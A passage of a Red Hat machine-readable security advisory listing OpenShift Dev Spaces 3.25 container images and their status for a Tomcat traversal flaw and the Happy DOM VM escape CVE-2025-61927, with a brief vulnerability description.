"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "tomcat: org.apache.tomcat/tomcat-catalina: Apache Tomcat: Directory traversal via rewrite with possible RCE"
},
{
"cve": "CVE-2025-61927",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2025-10-10T20:00:59.402374+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2403177"
}
],
"notes": [
{
"category": "description",
"text": "Happy DOM is a JavaScript implementation of a web browser without its graphical user interface. Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality. It seems like what the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules. Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment. Version 20.0.0 patches the issue by changing JavaScript evaluation to be disabled by default.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "happy-dom: Happy-DOM VM Context Escape",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
